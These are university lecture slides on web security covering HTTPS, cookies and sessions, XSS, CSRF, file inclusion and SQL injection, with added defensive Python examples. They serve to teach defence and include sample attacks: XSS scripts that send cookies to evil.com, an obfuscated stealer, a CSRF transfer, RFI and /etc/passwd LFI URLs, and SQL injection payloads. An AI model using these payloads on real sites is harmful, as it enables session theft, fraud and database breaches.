Web Security - University of Arizona - Computer Science Department


16 Feb. 2014 (3 years and 3 months ago)


CSc466/566 Computer Security
20: Web Security
Version: 2012/05/03 12:41:30
Department of Computer Science
University of Arizona
collberg@gmail.com
Copyright (c) 2012 Christian Collberg
Christian Collberg
1/74
Outline
1 Introduction
2 HTTPS
3 Dynamic Content
  DOM Tree
  Sessions and Cookies
4 Attacks on Clients
  Session Hijacking
  Click-Jacking
  Privacy Attacks
  XSS
  CSRF
5 Attacks on Servers
  PHP
  File Inclusion
  SQL Injection Attacks
6 Summary

Static Web Content
HTTP Request

GET /index.html HTTP/1.1
Host: www.site.com

HTTP Response

HTTP/1.1 200 OK
Server: Apache
Date: Mon, 16 Apr 2012 21:44:29 GMT
Expires: -1
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: ...
Content-Length: 314

<!doctype html>
<html><body>
...
</body></html>

HTML
HTTP Request

GET /index.html HTTP/1.1
Host: www.site.com

HTTP Response

<b>bold text</b>
<ul>
<li>list item 1
<li>list item 2
</ul>
<a href="site.com/boat.jpg">Link!</a>
<script>
document.location = ...
</script>
<img src="boat.jpg">

Forms
www.site.com/register.php

<HTML>
<TITLE>Registration</TITLE>
<BODY>
<FORM ACTION="register.php" METHOD="GET">
<INPUT TYPE="text" NAME="name">
<INPUT TYPE="text" NAME="email">
<INPUT TYPE="submit" VALUE="Submit">
</FORM>
</BODY>
</HTML>

HTTP Request

www.site.com/register.php?name="Alice"&email="alice@gmail.com"

Confidentiality
HTTP requests and responses are delivered via TCP on port 80.
All traffic is in the clear!
MITM attacks.

HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
2 The browser sends chase.com a list of cryptographic ciphers/hash functions it supports.
3 The server selects the strongest ciphers/hash functions they both support.
4 chase.com tells the browser of its cryptographic choices.
5 chase.com sends the browser its certificate Cert_chase.com, containing its public key P_chase.com.
6 The browser verifies the authenticity of Cert_chase.com.
7 Browser generates a random number R.
8 The browser encrypts R with P_chase.com and sends it to chase.com.
9 Starting from R, the browser and chase.com generate a shared secret key K.
10 Subsequent messages M: send E_K(M), H(K||M).

Figure: the HTTPS handshake as a message sequence between Alice, chase.com and verisign.com:
Alice -> chase.com: https://chase.com
Alice -> chase.com: 3DES, AES, SHA-1, ...
chase.com -> Alice: Let's use AES, SHA-1!
chase.com -> Alice: Cert_chase.com
Alice -> verisign.com: Verify chase.com
Alice -> chase.com: E_P_chase.com(R)
Alice -> chase.com: E_K(M), H(K||M)
chase.com -> Alice: E_K(M), H(K||M)

Digital Certificates
A Certificate Authority (CA) is a trusted third party (TTP) who issues a certificate stating that
  The Bob who lives on Desolation Row and has phone number (555) 867-5309 and the email address bob@gmail.com has the public key P_B. This certificate is valid until June 11, 2012.
The CA has to digitally sign (with their private key S_CA) this certificate so that we know that it's real.

Extended Validation Digital Certificates
Domain validation only SSL certificates: only minimal verification of the details in the certificate.
An Extended Validation Certificate can only be issued by a CA that passes an audit showing that it vets applications according to strict criteria.
Same structure as other X.509 public key certificates.
Not stronger encryption.

Extended Validation Digital Certificates...
In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV display in Internet Explorer 7. Their paper concluded that participants who received no training in browser security features did not notice the extended validation indicator and did not outperform the control group, whereas participants who were asked to read the Internet Explorer help file were more likely to classify both real and fake sites as legitimate.
Source: http://en.wikipedia.org/wiki/Extended_Validation_Certificate

Certificate Hierarchy
Certificates are signed by certificates higher in a certificate hierarchy.
The root certificate is self-signed.
Chain of Trust: similar to the Trusted Platform Module's trusted boot.

Checking the Validity of a Certificate
Is the certificate signed by a known trusted CA (pre-installed in the browser)?
Has the certificate expired?
Is the certificate revoked?
1 Extract the revocation site URL from the certificate.
2 Get the certificate revocation list.
3 Is the list signed by the CA?
4 Is this certificate's serial number on the list?

In-Class Exercise: Goodrich & Tamassia C-7.8
Suppose a web client and web server for a popular shopping website have performed a key exchange so that they are now sharing a secret session key.
Describe a secure method for the web client to then navigate around various pages of the shopping site, optionally placing things into a shopping cart.
Your solution is allowed to use one-way hash functions and pseudo-random number generators, but it cannot use HTTPS, so it does not need to achieve confidentiality.
Your solution should be resistant to HTTP session hijacking even from someone who can sniff all the packets.

Dynamic Content
Plain html pages are static.
Dynamic content can change, even without reloading the page.
Client-side scripts are included in web pages to provide dynamic content.
Web pages are represented internally in the browser as DOM trees (Document Object Model).
Scripts can manipulate the DOM tree.
Most scripts are written in JavaScript.

DOM Tree Example

<html>
<head>
<title>The document</title>
</head>
<body>
<div>Data</div>
<ul>
<li>Warning</li>
<li></li>
</ul>
<div>Top Secret!</div>
</body>
</html>

Source: http://javascript.info/tutorial/dom-nodes

DOM Tree Example...
HTML
  HEAD
    TITLE
      The document
  BODY
    DIV
      Data
    UL
      LI
        Warning
      LI
    DIV
      Top Secret!

JavaScript
JavaScript code can be included within HTML documents:

<script type="text/javascript">
function hello() {
  alert("Hello world!");
}
</script>

JavaScript functions can be invoked as a result of clicks, etc.:

<img src="..." onMouseOver="javascript:hello()">

DOM Tree Traversal
DOM tree node properties:
name                          description
firstChild, lastChild         start/end of this node's list of children
childNodes                    array of all this node's children
nextSibling, previousSibling  neighboring nodes with the same parent
parentNode                    the element that contains this node
Thus, you can traverse the DOM tree from within JavaScript:

window.document.childNodes[0].childNodes[1].childNodes[4]

Sessions
HTTP is a state-less protocol:
  every request a browser makes for a page is a new event to the server;
  the server keeps no information (automatically) between page loads.
A session is extra information stored about a visitor between interactions.
Three methods to keep track of sessions:
1 Hidden form fields,
2 Client-side cookies,
3 Server-side session.
We must protect against session hijacking: an attacker getting hold of a user's session information and impersonating him to the server.

Sessions Using Hidden Form Fields
Any information that needs to survive between interactions is stored in the browser in hidden fields in the HTML.
The information is sent back to the server in POST or GET requests.

<HTML><BODY>
<FORM ACTION="http://www.victoriassecret.com/buy.jsp" METHOD="get">
<INPUT TYPE="hidden" NAME="name" VALUE="Alice">
<INPUT TYPE="hidden" NAME="height" VALUE="170cm">
<INPUT TYPE="hidden" NAME="weight" VALUE="53kg">
<INPUT TYPE="submit">
</FORM>
</BODY></HTML>

HTTP is sent in cleartext: susceptible to MITM attack.

Sessions Using Hidden Form Fields...
Figure: Eve sniffs the request name=Alice&height=170cm&weight=53kg and recovers the hidden fields:
<INPUT TYPE="hidden" NAME="name" VALUE="Alice">
<INPUT TYPE="hidden" NAME="height" VALUE="170cm">
<INPUT TYPE="hidden" NAME="weight" VALUE="53kg">
Use HTTPS instead.

Sessions Using Cookies
A cookie is a piece of data sent to the client by the web server.
The cookie is stored on the client.
When the user returns to the site, the cookie is sent to the web server.
cookie

"name"="Alice"
"height"="170cm"
"weight"="53kg"
expire=10 Dec, 2012
domain=.victoriassecret.com
path: /
send for: any type

Sessions Using Cookies
Let's assume Alice is browsing to http://www.victoriassecret.com.
She fills out a form with her personal data:

<HTML><BODY>
<FORM ACTION="http://www.victoriassecret.com/buy.jsp" METHOD="get">
<INPUT TYPE="text" NAME="name" VALUE="Alice">
<INPUT TYPE="text" NAME="height" VALUE="170cm">
<INPUT TYPE="text" NAME="weight" VALUE="53kg">
<INPUT TYPE="submit">
</FORM>
</BODY></HTML>

Sessions Using Cookies...
Figure: Alice submits the form, the server's response sets the cookie, and the browser stores it and returns it on later visits.
cookie

"name"="Alice"
"height"="170cm"
"weight"="53kg"
expire=10 Dec, 2012
domain=.victoriassecret.com
path: /
send for: any type

<INPUT TYPE="text" NAME="name" VALUE="Alice">
<INPUT TYPE="text" NAME="height" VALUE="170cm">
<INPUT TYPE="text" NAME="weight" VALUE="53kg">

Sessions Using Cookies: Cookie Properties
Expiration date: if none is specified, the cookie is deleted when the user exits the browser.
Domain name, the site for which this cookie is valid:
  Only hosts within a domain can set a cookie for that domain.
  A subdomain can set a cookie for a domain at most one level up.
  A subdomain can access a cookie for the top-level domain.
  A host cannot set cookies for the TLDs.

Cookie Domains
Figure: which hosts may set or read a cookie for which domain. Hosts shown: mail.example.com, example.com, one.mail.example.com, example.com. Cookie domains shown: domain: example.com, domain: mail.example.com, domain: example.com, domain: .com. Operations shown, with the forbidden ones crossed out: SET; SET (crossed out); READ, SET (crossed out); SET (crossed out); SET, READ.

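The four cookie-domain rules from the Cookie Properties slide, written out as a checker. This is an added example, not code from the slides; the host and domain names are constructed, and "top-level domain" in the third rule is read as the site's own domain (example.com), not the TLD.

```python
# Added example (not from the slides): the cookie-domain rules as a checker.
# Cookie domains may be written with or without a leading dot (".example.com").

def labels(name: str) -> list[str]:
    """Split a host or domain name into labels, ignoring a leading dot."""
    return [part for part in name.lower().strip(".").split(".") if part]

def is_tld(domain: str) -> bool:
    """A bare top-level domain such as 'com' or '.com' has a single label."""
    return len(labels(domain)) == 1

def is_within(host: str, domain: str) -> bool:
    """True if host equals domain or is a subdomain of it."""
    h, d = labels(host), labels(domain)
    return len(h) >= len(d) and h[len(h) - len(d):] == d

def can_set_cookie(host: str, domain: str) -> bool:
    """Rule 1: only hosts within the domain may set a cookie for it.
    Rule 2: a subdomain may set a cookie at most one level up.
    Rule 4: nobody may set a cookie for a TLD."""
    if is_tld(domain) or not is_within(host, domain):
        return False
    return len(labels(host)) - len(labels(domain)) <= 1

def can_read_cookie(host: str, domain: str) -> bool:
    """Rule 3: a host can read cookies set for any domain it lies within,
    its parent site domain included; a cookie for a TLD never exists."""
    return not is_tld(domain) and is_within(host, domain)

# Constructed sample: the hosts and domains from the Cookie Domains figure.
CASES = [
    ("mail.example.com", "example.com"),        # set: yes (one level up)
    ("one.mail.example.com", "example.com"),    # set: no (two levels up), read: yes
    ("one.mail.example.com", "mail.example.com"),  # set: yes
    ("example.com", "mail.example.com"),        # set: no (not within), read: no
    ("example.com", ".com"),                    # set: no (TLD)
]

def table() -> list[tuple[str, str, bool, bool]]:
    """(host, domain, may_set, may_read) for every constructed case."""
    return [(h, d, can_set_cookie(h, d), can_read_cookie(h, d)) for h, d in CASES]
```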
Cookie Transport
Cookies, by default, are sent using HTTP.
MITM attacks!
Countermeasures:
1 Set the secure flag: HTTPS is used instead.
2 Encrypt the cookie value.
3 Obfuscate the cookie name.

Server-Side Sessions
User information is kept in a database on the server.
A session ID (session token) identifies the user's session.
GET/POST variables or cookies are used to store the token on the client.
When the user browses to a page, the token is sent to the server, and the user's data is looked up from the database.

<HTML><BODY>
<FORM ACTION="http://www.victoriassecret.com/buy.jsp" METHOD="get">
<INPUT TYPE="hidden" NAME="sessionID" VALUE="0x324A...">
</FORM>
</BODY></HTML>

Server-Side Sessions
sessionID   data
0x878...    name="Alice", height="170cm", ...
0x9A5...    name="Bob", height="180cm", ...
The client sends sessionID=0x878...
The session ID should be hard to guess.

Session Hijacking
TCP session hijacking can be used to take over an HTTP session.
The attacker needs to impersonate the session mechanism (cookies, POST/GET, session ID).
Packet sniffers can be used to discover session IDs/cookies.
Replay attacks: an attacker uses an old (previously valid) token to attempt an HTTP session hijacking attack.

Session Hijacking
Figure: Alice sends sessionID=0x878... to the server; Eve, having sniffed it, sends the same sessionID=0x878... and is served Alice's data.
sessionID   data
0x878...    name="Alice", height="170cm"
0x9A5...    name="Bob", height="180cm"

Session Hijacking: Countermeasures
1 Client-side session tokens need to be encrypted.
2 Server-side session IDs need to be random.
3 To protect against replay attacks:
  1 add random numbers to client-side/server-side tokens,
  2 change session tokens frequently.

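An added example (not from the slides) covering countermeasures 2 and 3 above and the in-class exercise on HTTPS: with the shared key K from the key exchange, the client tags every plain-HTTP request with an HMAC over a fresh random nonce, so a sniffer sees the tag but not K, and the server rejects bad tags and reused nonces. The names (SessionServer, sign_request), the sample key and the request paths are my own, constructed for the example.

```python
# Added example (not from the slides): HMAC-tagged requests over plain HTTP,
# using the shared session key K; nonces stop replay of a sniffed request.
import hashlib
import hmac
import secrets

def sign_request(key: bytes, session_id: str, nonce: str, method: str, path: str) -> str:
    """Client side: tag = HMAC-SHA256(K, session_id || nonce || method || path).
    The tag proves knowledge of K without revealing it; the nonce makes each
    request unique, so replaying a sniffed request produces a known nonce."""
    msg = "|".join([session_id, nonce, method, path]).encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()

class SessionServer:
    def __init__(self) -> None:
        self.sessions: dict[str, tuple[bytes, set[str]]] = {}  # sid -> (K, seen nonces)

    def new_session(self, key: bytes) -> str:
        """Server-side session ID: 128 random bits, hence hard to guess."""
        sid = secrets.token_hex(16)
        self.sessions[sid] = (key, set())
        return sid

    def accept(self, session_id: str, nonce: str, method: str, path: str, tag: str) -> bool:
        """Reject unknown sessions, wrong tags, and nonces already seen."""
        entry = self.sessions.get(session_id)
        if entry is None:
            return False
        key, seen = entry
        expected = sign_request(key, session_id, nonce, method, path)
        if not hmac.compare_digest(expected, tag):   # constant-time comparison
            return False
        if nonce in seen:                            # replay of a sniffed request
            return False
        seen.add(nonce)
        return True

def demo() -> tuple[bool, bool, bool]:
    """(legitimate request, Eve replaying it, Eve forging a different request)."""
    key = secrets.token_bytes(32)        # K from the key exchange (constructed here)
    server = SessionServer()
    sid = server.new_session(key)
    nonce = secrets.token_hex(8)
    tag = sign_request(key, sid, nonce, "POST", "/cart/add?item=42")
    ok = server.accept(sid, nonce, "POST", "/cart/add?item=42", tag)
    replayed = server.accept(sid, nonce, "POST", "/cart/add?item=42", tag)
    # Eve has sniffed sid, nonce and tag but not K, so she cannot tag a new request.
    forged = server.accept(sid, secrets.token_hex(8), "POST", "/cart/add?item=99", tag)
    return ok, replayed, forged
```

Confidentiality is out of scope, as in the exercise: the path and the cart contents still travel in the clear; only authenticity and freshness are protected.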
Click-Jacking
Clicking on a link takes you to the wrong site:

<a onMouseUp=window.open("http://www.evil.com") href="http://www.trusted.com">Trust Me!</a>

Click-fraud: increasing the click-throughs to increase advertising revenue.

Privacy Attacks: Third-party cookies
1 You browse to http://www.example1.com:

<HTML><BODY>
<img src="http://ads.evil.com">
</BODY></HTML>

2 ads.evil.com sets a third-party cookie on your machine!
3 You browse to http://www.example2.com:

<HTML><BODY>
<img src="http://ads.evil.com">
</BODY></HTML>

4 ads.evil.com sets a third-party cookie on your machine!
5 You browse to http://www.ads.evil.com, it reads your cookies, and gets your browsing history!

Cross-Site Scripting (XSS)
Idea:
1 attacker injects code C into a website,
2 C makes its way into generated web page P,
3 a user is served the P page,
4 the injected code C is executed on the user's site.
Why does this work? The web programmer forgets to check (sanitize) input values!

Cross-Site Scripting...
Bob's server sends Alice this form:

<HTML>
<TITLE>Sign My Guestbook!</TITLE>
<BODY>
<FORM ACTION="sign.php" METHOD="POST">
<INPUT TYPE="text" NAME="name">
<INPUT TYPE="text" NAME="message" size="40">
<INPUT TYPE="submit" VALUE="Submit">
</FORM>
</BODY>
</HTML>

Cross-Site Scripting...
Alice adds the text "I loved your new site!", and returns it to Bob's site.
In return, Bob sends her a new page:

<HTML>
<TITLE>Sign My Guestbook!</TITLE>
<BODY>
Thanks everybody for your input!<br>
Eve: I sat behind you in 7th grade! Call me!<br>
Joe: Yo, frat-bro, let's grab some brewskies!<br>
Alice: I loved your new site!<br>
</BODY>
</HTML>

Cross-Site Scripting...
What if Eve had instead added the text

<script>alert("Alice sucks!");</script>

as her comment?
Then Alice would be executing this page:

<HTML>
<TITLE>Sign My Guestbook!</TITLE>
<BODY>
Thanks everybody for your input!<br>
Eve: <script>alert("Alice sucks!");</script><br>
Joe: Yo, frat-bro, let's grab some brewskies!<br>
Alice: I loved your new site!
</BODY>
</HTML>

Cross-Site Scripting...
Obviously, Eve could insert more harmful code:

<script>
document.location =
  "http://www.evil.com/steal.php?cookie=" + document.cookie;
</script>

This redirects the browser to the evil site, and passes along Alice's cookies.
Alice would notice that she's being redirected to a weird site!

Cross-Site Scripting...
Eve could be more cunning:

<script>
img = new Image();
img.src = "http://www.evil.com/steal.php?cookie=" + document.cookie;
</script>

The browser tries to load an image from the evil site, passing along the cookie.
No image is displayed: Alice doesn't get suspicious!

Cross-Site Scripting...
An iframe is used to create a web page within a web page:

<iframe frameborder=0 src="" height=0 width=0 id="XSS" name="XSS">
</iframe>
<script>
frames["XSS"].location.href =
  "http://www.evil.com/steal.php?cookie=" + document.cookie;
</script>

This creates an invisible iframe, adding it to the DOM.
The script changes the source of the iframe to the evil site.

Cross-Site Scripting: Nonpersistent
So far, we've seen persistent XSS attacks:
  the code Eve injects gets added to the server's database;
  the code is displayed on the web page.
Non-persistent XSS attack: the injected code only persists over the attacker's session.
Example:
1 attacker searches for "sneezing panda",
2 website responds with "search results for 'sneezing panda' = ..."

Cross-Site Scripting: Nonpersistent...
Assume a search page where the query is passed as a GET parameter:

http://victim.com/search.php?query=searchstring

The attacker constructs this URL:

http://victim.com/search.php?query=<script>document.location="http://evil.com/steal.php?cookie="+document.cookie</script>

When the victim navigates to the URL, the payload will be executed in their browser.

Cross-Site Scripting: Countermeasures
Programmers must sanitize all inputs:
  Strip out all <script> tags!
Users can disable client-side scripts.
Firefox NoScript XSS detection sanitizes GET/POST variables: remove quotes, double quotes, brackets.

Cross-Site Scripting: Counter-Countermeasures
Evade filtering by obfuscating GET requests using URL encoding.
This request

<script>alert('hello');</script>

turns into

%3Cscript%3Ealert%28%27hello%27%29%3B%3C%2Fscript%3E

Cross-Site Scripting: Counter-Countermeasures...
Obfuscate the script to avoid detection:

<script>
a = document.cookie;
b = "ht";
c = "tp";
d = "://";
e = "ww";
f = "w.";
g = "vic";
h = "tim";
i = ".c";
j = "om/search.p";
k = "hp?q=";
document.location = b + c + d + e + f + g + h + i + j + k + a;
</script>

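The Countermeasures slide says to strip <script> tags, and the URL-encoding slide shows how a filter applied to the raw request value misses the encoded form. An added example (not from the slides) that contrasts that blacklist with escaping untrusted text at the point of output; the guestbook entries are constructed, the two payloads are the ones shown on the XSS slides, and the function names are my own.

```python
# Added example (not from the slides): Bob's guestbook rendered two ways,
# with a <script>-stripping blacklist and with HTML output escaping.
import html
import re
from urllib.parse import unquote

def strip_script_tags(text: str) -> str:
    """The blacklist countermeasure from the slides: remove <script> tags."""
    return re.sub(r"</?script[^>]*>", "", text, flags=re.IGNORECASE)

def render_guestbook(entries: list[tuple[str, str]]) -> str:
    """Escape every untrusted value before placing it in HTML text, so what
    Eve typed is displayed as text and never parsed as markup."""
    lines = ["<HTML><TITLE>Sign My Guestbook!</TITLE><BODY>",
             "Thanks everybody for your input!<br>"]
    for name, message in entries:
        lines.append(f"{html.escape(name)}: {html.escape(message)}<br>")
    lines.append("</BODY></HTML>")
    return "\n".join(lines)

def contains_script(page: str) -> bool:
    """Does the rendered page contain a real <script> element?"""
    return re.search(r"<script\b", page, flags=re.IGNORECASE) is not None

# Constructed guestbook submissions, as received in the raw POST body.
ENTRIES = [
    ("Eve", '<script>alert("Alice sucks!");</script>'),
    ("Eve", "%3Cscript%3Ealert%28%27hello%27%29%3B%3C%2Fscript%3E"),  # URL-encoded
    ("Alice", "I loved your new site!"),
]

def compare_defences() -> dict[str, bool]:
    """Blacklist applied before URL-decoding (the ordering the encoded payload
    exploits) versus decoding first and escaping on output."""
    blacklisted = "\n".join(f"{n}: {unquote(strip_script_tags(m))}<br>" for n, m in ENTRIES)
    escaped = render_guestbook([(n, unquote(m)) for n, m in ENTRIES])
    return {
        "blacklist_has_script": contains_script(blacklisted),
        "escaped_has_script": contains_script(escaped),
        "alice_text_intact": "Alice: I loved your new site!<br>" in escaped,
    }
```

Escaping handles both payloads because it does not try to recognise attacks at all; it only guarantees that a value inserted as text stays text.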
Cross-Site Request Forgery (CSRF)
Basic idea:
1 Alice has an account with www.bob.com.
2 www.bob.com trusts Alice.
3 Alice is authenticated with www.bob.com (through an active cookie, for example).
4 Alice visits a site www.evil.com.
5 www.evil.com executes a malicious script on www.bob.com (who thinks he's talking to Alice!).
I.e., in a CSRF attack a website executes commands it received from a user it trusts.

Cross-Site Request Forgery (CSRF)...
Alice is logged into her bank www.bank.com, her authentication stored in a cookie.
She visits www.evil.com that has this script:

<script>
document.location = "http://bank.com/transfer.php?amount=1000&from=Alice&to=Eve";
</script>

Alice's browser redirects to her bank which executes the transfer.

Cross-Site Request Forgery: Login Attack
A malicious website issues cross-site requests on behalf of the user, but makes the user authenticate as the attacker.
Example:
1 Alice orders cookies from evescookies.com.
2 Alice logs in to paypal.com to pay for the cookies.
3 But, Eve has injected code that makes Alice authenticate to PayPal as Eve.
4 Alice gives paypal.com her credit card number.
5 Eve logs in to paypal.com to collect Alice's credit card number.

Cross-Site Request Forgery: Login Attack...
Figure: message sequence between Alice, evescookies.com and paypal.com:
Alice -> evescookies.com: buy cookies!
evescookies.com -> Alice: script: user=eve, pw=cookies
Alice -> paypal.com: pay for cookies!
Alice -> paypal.com: login: user=eve, pw=cookies
Alice -> paypal.com: VISA=4750...
evescookies.com -> paypal.com: login
paypal.com -> evescookies.com: VISA=4750...

Attacks on Servers
Server-side scripts execute code on the server to generate dynamic pages.
Written in php, perl, Java Servlets, ....
Access databases, ....

Generating Dynamic Content
Figure: message sequence between Alice, php and mysql. Alice sends name=Alice, pw=love; php connects to mysql and sends SELECT ...; mysql returns data; php returns <html>...</html> to Alice.

PHP
<?php insert code here ?>.
$_GET[variable]: array of GET input variables.
No typing.

<HTML>
<BODY>
Your number: <?php echo $x = $_GET['number']; ?>.
Square is <?php $y = $x * $x; echo $y; ?>.
</BODY>
</HTML>

PHP...
Assume the GET variable number is 5, then PHP will generate this page:

<HTML>
<BODY>
Your number: 5.
Square is 25.
</BODY>
</HTML>

Remote File Inclusion (RFI)
Let this be index.php:

<?php
include("header.html");
include($_GET['page'] . ".php");
include("footer.html");
?>

A user can go to www.cnn.com/index.php?page=news and a news page is generated.
An attacker can go to

http://cnn.com/index.php?page=http://evil.com/evilcode

forcing the server to include and execute the remote file evilcode.php.
Most sites now forbid RFI.

Local File Inclusion (LFI)
As RFI, but a local file gets executed:

http://www.cnn.com/index.php?page=secretpage

Getting the password file:

http://www.cnn.com/index.php?page=/etc/passwd%00

%00 is a null byte, effectively removing the .php extension.

Local File Inclusion (LFI)...
Attack: The attacker
1 uploads a file (a php script hiding as a .jpg file, for example).
2 tricks the site to execute the uploaded file using LFI.
Figure: Eve uploads boat.jpg, whose contents are <?php ... ?>, to flicker.com, then requests flicker.com/index.php?page=pics/boat.jpg.

Local File Inclusion (LFI)...
For example, Nasvir Nagra's Visualize program http://search.cpan.org/~jnagra/Perl-Visualize-1.02/Visualize.pm can embed a perl script into a gif file, so that the file is both an image and an executable program.

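An added example (not from the slides) of how index.php from the RFI and LFI slides can validate its page parameter before including anything: it rejects the null-byte trick, remote URLs, absolute and traversing paths, and any name outside an allowlist, in that order. The directory, the allowlist and the function names are constructed for the example.

```python
# Added example (not from the slides): validating ?page=... before include().
from pathlib import Path
from urllib.parse import unquote

PAGES_DIR = Path("/var/www/pages").resolve()    # constructed, hypothetical location
ALLOWED_PAGES = {"news", "sports", "weather"}   # constructed allowlist of page names

def resolve_page(raw_param: str, pages_dir: Path = PAGES_DIR, allowed=ALLOWED_PAGES) -> Path:
    """Return the file to include for ?page=..., or raise ValueError.
    Checks mirror the tricks on the RFI/LFI slides: %00 null byte, remote
    URL, absolute path or traversal, and finally the allowlist."""
    page = unquote(raw_param)           # the web server URL-decodes %00 etc.
    if "\x00" in page:
        raise ValueError("null byte in page name")
    if "://" in page or page.startswith("//"):
        raise ValueError("remote inclusion not allowed")
    if page.startswith(("/", "\\")) or ".." in page.replace("\\", "/").split("/"):
        raise ValueError("path outside the pages directory")
    if page not in allowed:
        raise ValueError(f"unknown page {page!r}")
    target = (pages_dir / f"{page}.php").resolve()
    # Belt and braces: even an allowlisted name must resolve under pages_dir.
    if pages_dir not in target.parents:
        raise ValueError("resolved path escapes the pages directory")
    return target

def classify(raw_param: str) -> str:
    """'ok:<file>' for an acceptable request, otherwise the rejection reason."""
    try:
        return "ok:" + resolve_page(raw_param).name
    except ValueError as exc:
        return "rejected: " + str(exc)

# Constructed requests: the legitimate one and the three from the slides.
SAMPLE_REQUESTS = ["news", "http://evil.com/evilcode", "/etc/passwd%00",
                   "../../etc/passwd", "pics/boat.jpg", "secretpage"]

def audit() -> dict[str, str]:
    return {req: classify(req) for req in SAMPLE_REQUESTS}
```

With an allowlist the extension-stripping null byte and the uploaded boat.jpg never reach include() at all; the earlier checks exist so that the log states the specific reason.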
Accessing a Backend Database
Figure: message sequence between Alice, php and mysql. Alice sends name=Alice, pw=love; php sends SELECT ... to mysql; mysql returns data.

SQL tables
SQL databases store records as tables:
id  title       author  body
1   Databases   John    Story 1
2   Computers   Joe     Story 2
3   Security    Jane    Story 3
4   Technology  Julia   Story 4

SQL commands
SQL commands for accessing a relational database:
SELECT  extract records from tables
INSERT  insert new records in a table
UPDATE  alter a record in a table
DELETE  remove a record in a table
UNION   combine the results of multiple queries

SQL queries
id  title       author  body
1   Databases   John    Story 1
2   Computers   Joe     Story 2
3   Security    Jane    Story 3
4   Technology  Julia   Story 4

SELECT * FROM news WHERE id=3
SELECT body FROM news WHERE author="joe"

SQL Injection Attack

<?php
$query = 'SELECT * FROM news WHERE id=' . $_GET['id'];
$out = mysql_query($query);
echo "<ul>";
while ($row = mysql_fetch_array($out)) {
  echo "<li>" . $row['id'];
  echo "<li>" . $row['title'];
  echo "<li>" . $row['author'];
  echo "<li>" . $row['body'];
}
echo "</ul>";
?>

SQL Injection Attack...
Consider this URL:

http://www.cnn.com/news.php?id=3

The query would
1 extract the 3rd news article,
2 generate an HTML page, and
3 send it to the user.

SQL Injection Attack...
Consider instead

http://www.cnn.com/news.php?id=NULL UNION SELECT cardno,first,last,email FROM users

Since the PHP code is

<?php
$query = 'SELECT * FROM news WHERE id=' . $_GET['id'];
...
?>

this would force the server to execute

SELECT * FROM news WHERE id=NULL UNION SELECT cardno,first,last,email FROM users

revealing all account information.

SQL Injection: Bypassing Authentication
Consider this server-side login script:

<?php
$query = 'SELECT * FROM news WHERE email="' . $_POST['email'] . '"' .
         ' AND pwdhash="' . hash('sha256', $_POST['password']) . '"';
$out = mysql_query($query);
if (mysql_num_rows($out) > 0) {
  echo "Login successful!";
} else {
  $access = false;
  echo "Login failed";
}
?>

SQL Injection: Bypassing Authentication
Let the attacker enter this into the login form:
email = " OR 1=1;--
password = (empty)
Then, the original query

'SELECT * FROM news WHERE email="' . $_POST['email'] . '"' .
' AND pwdhash="' . hash('sha256', $_POST['password']) . '"'

turns into

SELECT * FROM news WHERE email="" OR 1=1;-- AND pwdhash=...

Note that -- is PHP's comment character.
The query returns the entire user table to the attacker.

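The news.php query from the SQL Injection Attack slides, rebuilt on an in-memory SQLite database as an added example (not from the slides): once by string concatenation exactly as the PHP does it, once with a bound parameter, both fed the UNION payload shown above. Table contents and card numbers are constructed; the function names are my own.

```python
# Added example (not from the slides): the concatenated query beside the
# parameterised one, run against constructed news and users tables.
import sqlite3

def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, author TEXT, body TEXT);
        INSERT INTO news VALUES (1,'Databases','John','Story 1'),
                                (2,'Computers','Joe','Story 2'),
                                (3,'Security','Jane','Story 3'),
                                (4,'Technology','Julia','Story 4');
        CREATE TABLE users(cardno TEXT, first TEXT, last TEXT, email TEXT);
        INSERT INTO users VALUES ('4750-0000-0000-0001','Alice','A','alice@example.com'),
                                 ('4750-0000-0000-0002','Bob','B','bob@example.com');
    """)
    return db

def vulnerable_news(db: sqlite3.Connection, id_param: str) -> list[tuple]:
    """The slide's PHP, literally: the untrusted id is pasted into the SQL text,
    so whatever follows it is parsed as SQL."""
    query = "SELECT * FROM news WHERE id=" + id_param
    return db.execute(query).fetchall()

def safe_news(db: sqlite3.Connection, id_param: str) -> list[tuple]:
    """Bound parameter: the client's string is compared to the id column as a
    value and never parsed as SQL. A payload simply matches no row."""
    return db.execute("SELECT * FROM news WHERE id=?", (id_param,)).fetchall()

UNION_PAYLOAD = "NULL UNION SELECT cardno,first,last,email FROM users"  # from the slide

def demo() -> dict:
    db = make_db()
    return {
        "normal": vulnerable_news(db, "3"),
        "leaked_cards": sorted(r[0] for r in vulnerable_news(db, UNION_PAYLOAD)),
        "safe_normal": safe_news(db, "3"),
        "safe_payload": safe_news(db, UNION_PAYLOAD),
    }
```

The UNION works because the news table and the injected SELECT both have four columns, which is why the slide's payload names exactly four fields of users.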
Readings and References
Chapter 7 in Introduction to Computer Security, by Goodrich and Tamassia.